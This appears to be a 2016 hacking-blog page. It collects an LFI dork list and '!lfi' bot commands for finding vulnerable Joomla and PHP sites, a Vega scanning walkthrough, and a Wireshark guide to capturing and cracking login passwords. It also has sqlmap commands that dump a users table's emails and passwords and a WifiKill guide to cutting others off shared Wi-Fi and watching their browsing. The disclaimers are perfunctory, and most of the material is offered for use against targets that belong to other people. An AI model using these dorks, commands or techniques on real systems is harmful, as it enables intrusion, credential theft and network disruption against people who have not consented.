Sunday 9 October 2016

Simple dork scanner + Dorks list

Features :

2 search engine(google & bing)
depth scan
import url from file
proxy list
input google captcha(not available in Bing)

DOWNLOAD

Lfi Dork List 2016

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=


inurl:/include/new-visitor.inc.php?lvc_include_dir=


inurl:/_functions.php?prefix=


inurl:/cpcommerce/_functions.php?prefix=


inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=


inurl:/modules/agendax/addevent.inc.php?agendax_path=


inurl:/ashnews.php?pathtoashnews=


inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=


inurl:/pm/lib.inc.php?pm_path=


inurl:/b2-tools/gm-2-b2.php?b2inc=


inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=


inurl:/modules/agendax/addevent.inc.php?agendax_path=


inurl:/includes/include_once.php?include_file=


inurl:/e107/e107_handlers/secure_img_render.php?p=


inurl:/shoutbox/expanded.php?conf=


inurl:/main.php?x=


inurl:/myPHPCalendar/admin.php?cal_dir=


inurl:/index.php/main.php?x=


inurl:/index.php?include=


inurl:/index.php?x=


inurl:/index.php?open=


inurl:/index.php?visualizar=


inurl:/template.php?pagina=


inurl:/index.php?pagina=


inurl:/index.php?inc=


inurl:/includes/include_onde.php?include_file=


inurl:/index.php?page=


inurl:/index.php?pg=


inurl:/index.php?show=


inurl:/index.php?cat=


inurl:/index.php?file=


inurl:/db.php?path_local=


inurl:/index.php?site=


inurl:/htmltonuke.php?filnavn=


inurl:/livehelp/inc/pipe.php?HCL_path=


inurl:/hcl/inc/pipe.php?HCL_path=


inurl:/inc/pipe.php?HCL_path=


inurl:/support/faq/inc/pipe.php?HCL_path=


inurl:/help/faq/inc/pipe.php?HCL_path=


inurl:/helpcenter/inc/pipe.php?HCL_path=


inurl:/live-support/inc/pipe.php?HCL_path=


inurl:/gnu3/index.php?doc=


inurl:/gnu/index.php?doc=


inurl:/phpgwapi/setup/tables_update.inc.php?appdir=


inurl:/forum/install.php?phpbb_root_dir=


inurl:/includes/calendar.php?phpc_root_path=


inurl:/includes/setup.php?phpc_root_path=


inurl:/inc/authform.inc.php?path_pre=


inurl:/include/authform.inc.php?path_pre=


inurl:index.php?nic=


inurl:index.php?sec=


inurl:index.php?content=


inurl:index.php?link=


inurl:index.php?filename=


inurl:index.php?dir=


inurl:index.php?document=


inurl:index.php?view=





!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller = "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller = "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_bca-rss-syndicator&controller= "com_bca-rss-syndicator"
!lfi /index.php?option=com_joomlaupdater&controller= "com_joomlaupdater"
!lfi /index.php?option=com_redshop&view= "com_redshop"
!lfi /index.php?option=com_redtwitter&view= "com_redtwitter"
!lfi /index.php?option=com_wisroyq&controller= "com_wisroyq"
!lfi /index.php?option=com_jinventory&controller= "com_jinventory"
!lfi /index.php?option=com_appointment&controller= "com_appointment"
!lfi /index.php?option=com_datafeeds&controller= "com_datafeeds"
!lfi /index.php?option=com_fabrik&controller= "com_fabrik"
!lfi /index.php?option=com_hsconfig&controller= "com_hsconfig"
!lfi /index.php?option=com_joomlaflickr&controller= "com_joomlaflickr"
!lfi /index.php?option=com_jukebox&controller= "com_jukebox"
!lfi /index.php?option=com_jwhmcs&controller= "com_jwhmcs"
!lfi /index.php?option=com_sebercart&view= "com_sebercart"
!lfi /index.php?option=com_awiki&controller= "com_awiki"
!lfi /index.php?option=com_vjdeo&controller= "com_vjdeo"
!lfi /index.php?option=com_awdwall&controller= "com_awdwall"
!lfi /index.php?option=com_realtyna&controller= "com_realtyna"
!lfi /index.php?option=com_webeecomment&controller= "com_webeecomment"
!lfi /index.php?option=com_javoice&view= "com_javoice"
!lfi /index.php?option=com_foobla_suggestions&controller = "com_foobla_suggestions"
!lfi /index.php?option=com_powermail&controller= "com_powermail"
!lfi /index.php?option=com_pcchess&controller= "com_pcchess"
!lfi /index.php?option=com_spsnewsletter&controller= "com_spsnewsletter"
!lfi /index.php?option=com_alphauserpoints&view= "com_alphauserpoints"
!lfi /index.php?option=com_travelbook&controller= "com_travelbook"
!lfi /index.php?option=com_tweetla&controller= "com_tweetla"
!lfi /index.php?option=com_ticketbook&controller= "com_ticketbook"
!lfi /index.php?option=com_jajobboard&view= "com_jajobboard"
!lfi /index.php?option=com_jajobboard&controller= "com_jajobboard"
!lfi /index.php?option=com_jfeedback&controller= "com_jfeedback"
!lfi /index.php?option=com_jprojectmanager&controller= "com_jprojectmanager"
!lfi /index.php?option=com_preventive&controller= "com_preventive"
!lfi /index.php?option=com_myfiles&controller= "com_myfiles"
!lfi /index.php?option=com_onlineexam&controller= "com_onlineexam"
!lfi /index.php?option=com_joommail&controller= "com_joommail"
!lfi /index.php?option=com_memory&controller= "com_memory"
!lfi /index.php?option=com_market&controller= "com_market"
!lfi /index.php?option=com_diary&controller= "com_diary"
!lfi /index.php?option=com_webtv&controller= "com_webtv"
!lfi /index.php?option=com_horoscope&controller= "com_horoscope"
!lfi /index.php?option=com_arcadegames&controller= "com_arcadegames"
!lfi /index.php?option=com_flashgames&controller= "com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "com_addressbook"
!lfi /index.php?option=com_flexicontent&controller= "com_flexicontent"
!lfi /index.php?option=com_advertising&controller= "com_advertising"
!lfi /index.php?option=com_cvmaker&controller= "com_cvmaker"
!lfi /index.php?option=com_worldrates&controller= "com_worldrates"
!lfi /index.php?option=com_record&controller= "com_record"
!lfi /index.php?option=com_sweetykeeper&controller= "com_sweetykeeper"
!lfi /index.php?option=com_beeheard&controller= "com_beeheard"
!lfi /index.php?option=com_blogfactory&controller= "com_blogfactory"
!lfi /index.php?option=com_delicious&controller= "com_delicious"
!lfi /index.php?option=com_jacomment&view= "com_jacomment"
!lfi /index.php?option=com_lovefactory&controller= "com_lovefactory"
!lfi /index.php?option=com_mtfireeagle&controller= "com_mtfireeagle"
!lfi /index.php?option=com_photobattle&view= "com_photobattle"
!lfi /index.php?option=com_s5clanroster&view= "com_s5clanroster"
!lfi /index.php?option=com_s5clanroster&controller= "com_s5clanroster"
!lfi /index.php?option=com_wgpicasa&controller= "com_wgpicasa"
!lfi /index.php?option=com_zimbcomment&controller= "com_zimbcomment"
!lfi /index.php?option=com_zimbcore&controller= "com_zimbcore"
!lfi /index.php?option=com_gadgetfactory&controller= "com_gadgetfactory"
!lfi /index.php?option=com_matamko&controller= "com_matamko"
!lfi /index.php?option=com_archeryscores&controller= "com_archeryscores"
!lfi /index.php?option=com_multiroot&controller= "com_multiroot"
!lfi /index.php?option=com_multimap&controller= "com_multimap"
!lfi /index.php?option=com_drawroot&controller= "com_drawroot"
!lfi /index.php?option=com_google&controller= "com_google"
!lfi /index.php?option=com_if_surfalert&controller= "com_if_surfalert"
!lfi /index.php?option=com_orgchart&controller= "com_orgchart"
!lfi /index.php?option=com_mmsblog&controller= "com_mmsblog"
!lfi /index.php?option=com_wmi&controller= "com_wmi"
!lfi /index.php?option=com_ultimateportfolio&controller= "com_ultimateportfolio"
!lfi /index.php?option=com_noticeboard&controller= "com_noticeboard"
!lfi /index.php?option=com_smartsite&controller= "com_smartsite"
!lfi /index.php?option=com_graphics&controller= "com_graphics"
!lfi /index.php?option=com_php&file= "com_php"
!lfi /index.php?option=com_aardvertiser&task= "com_aardvertiser"
!lfi /index.php?option=com_jejob&view= "com_jejob"
!lfi /index.php?option=com_jeajaxeventcalendar&view= "com_jeajaxeventcalendar"
!lfi /index.php?option=com_dioneformwizard&controller= "com_dioneformwizard"
!lfi /index.php?option=com_jequoteform&view= "com_jequoteform"
!lfi /index.php?option=com_mscomment&controller= "com_mscomment"
!lfi /index.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_event&view= "com_event"
!lfi /index.php?option=com_product&controller= "com_product"
!lfi /index.php?option=com_job&controller= "com_job"
!lfi /index2.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_perchaimageattach&controller= "com_perchaimageattach"
!lfi /index.php?option=com_perchafieldsattach&controller = "com_perchafieldsattach"
!lfi /index.php?option=com_perchagallery&controller= "com_perchagallery"

Scan website for vulnerabilities in Kali Linux

Vega is an open source platform for testing the security of web applications. Vega can help you find and validate SQL injections , cross-site scripting (XSS) , inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java , GUI -based , and runs on Linux, OS X and Windows.
Vega includes an automated scanner for rapid testing and filtering proxies for tactical inspection. Vega can be expanded using a powerful API in the language of the web: Javascript.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
== using vega ==
It’s simple go to ” Applications – > Kali Linux -> Web Applications -> Web Application Proxies -> vega
vega1
And this is how it look like .
vega2

Click on “scan” and type a website url :
vega3
Add cookies if you want or regex exclusion .
vega4
The right side will show the vulnerability after the  scan is completed .
vega 6

The scanner is not very powerful but it’ quick to audit ,  5 minutes is enough , but for a thorough audit it is better to use more powerful tools.

How to sniff password using Wireshark

Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions.
This tutorial can be an angel and also devil in the same time, it depends to you who use this tutorial for which purpose…me as a writer of this tutorial just hope that all of you can use it in the right way , because I believe that no one from you want your password sniffed by someone out there so don’t do that to others too
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
Requirements :
1. Wireshark Network Analyzer (wireshark.org)
2. Network Card (Wi-Fi Card, LAN Card, etc) fyi : for wi-fi it should support promiscious mode
Step 1: Start Wireshark and capture traffic
In Kali Linux you can start Wireshark by going to
Application > Kali Linux > Top 10 Security Tools > Wireshark
In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0.
dz
Ideally you could just press Start button here and Wireshark will start capturing traffic. In case you missed this, you can always capture traffic by going back to Capture > Interface > Start
dz2
Step 2: Filter captured traffic for POST data
At this point Wireshark is listening to all network traffic and capturing them. I opened a browser and signed in a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark.
when wee type in your username, password and press the Login button, it generates a a POST method (in short – you’re sending data to the remote server).
To filter all traffic and locate POST data, type in the following in the filter section
http.request.method == “POST”
See screenshot below. It is showing 1 POST event.
dz4
Step 3: Analyze POST data for username and password
Now right click on that line and select Follow TCP Steam
dz5
This will open a new Window that contains something like this:
dz6
So in this case,
username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91
But hold on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can’t be a real password. It must be a hash value.
to crack this password its simple just open new terminal window and type this :
dz8
and its looks like this:
  1. username: sampleuser
  2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword

Exploit SQL Injection Using Sqlmap in kali linux

SQL injection : it is an attack that exploits non-parametrized SQL queries in a database , so that the attacker can insert their own queries.
Sqlmap : This is a very powerful penetration test tool (open source) , it automates the discovery and exploitation of vulnerabilities to SQL injection attacks. It has many functions , and included features such as detecting DBMS, databases, tables , columns, retrieve data and even take control of a database.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
The following tutorial was made with a  linux system ( kali linux ).
First we need a target to do this ,
go to your test website in this example we have used a PHP one, we then navigate between pages, when you see ” php? Id ” in the address bar , copy the address.
open your terminal and type this :
sqlmap –u www.site.com/product.php?catid=5  – -dbs
5
when sqlmap is done, it will tell you the Mysql version and some other information about the database.

At the end of the process , it will show you databases that it has found.
to see tables that are located at the database we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart –tables 
c


The result should be something like this :
Database: acuart
[8 tables]
+———–+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+———–+
Now we have a list of tables , we need to get columns so we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users –columns

The result should be like this :f
last step we need to get data from columns , so the final command will look like this.
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password -dump
 and here’s the final result : we have got the name, mail and password:
z

WifiKill – Disabling WiFi for Other Devices

What is WifiKill?

WifiKill is an android application that helps you to disable other people’s Wi-Fi internet connections on the same network. It is a kind of hacking process in which you are hacking other person’s internet connection and trying to disable it. This app is specifically developed for the Android smartphone users. You can easily become a hacker as WifiKill literally falls in the category of hacking and this application is capable of searching for the user information in the Wi-Fi modem.
WifiKill v2.3.2 is an amazing app through which you can get a wi-fi connection in full speed by using this application. You can easily eliminate unnecessary users who are connected to wi-fi connection on the same network. You can use this app on your android smartphone as it works effectively to disable other’s internet connection.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you

Features of WifiKill

  • Show the traffic consumed by the device.
  • Grabs blog traffic and show the sites visited by the grabbed devices.
  • Show the network names of the devices.
  • Reveals the total number of bytes transferred by the ‘snatched device’.
  • Capable of disabling the Internet access of any grabbed device.
  • You can also view what other’s are surfing on internet and even see what they download from internet.
  • It supports Tablets and hence it is both mobile and tablet-friendly!
  • WifiKill supports Android 4.0 and above only.

Requirements of WifiKill

  • It requires Root accessibility.
  • Works for Android 4.0 and above only.

How to use WifiKill

Using WifiKill app, you can easily disable one’s internet connection (Wi-Fi) which is on the same network. The capability of disabling other person’s Wi-Fi network connection is nothing but hacking their device. Here is a step-by-step procedure to hack a Wi-Fi network using WifiKill app on your android device.

Step 1: Initially, download it from the above link.
Step 2: Now, turn ON Wi-Fi on your Android phone and click to open the app.
Step 3: After opening the app, press the play button located on the top and the app will then start searching for the devices which are currently connected to the Wireless Internet network. Click on Grant to allow Superuser permission that is prompted on the screen.
wi1
Step 4: As soon as the scan for devices is completed, the app will then show all the devices connected to the hotspot. If you enable Show Network Names in the preferences, it will also display the names of all the devices found.
wi2
Step 5: Now, Click on one device and slide the grab button .Once grabbed you can see the network usage and websites that are being accessed by it.

Step 6: You can kill one device at a time or else you can also kill all the devices at the same time by grabbing them all and then killing them. You can only kill after you have grabbed a device. Grabbing the device will show you the bandwidth consumption and websites accessed by that particular device. The device will lose the internet connectivity when you Choose to kill it.

wi3
Step 7: When you are done, you can just switch off the kill button so that the devices will regain their Internet connectivity. Also don’t forget to stop the WifiKill by using the same button you used to start it.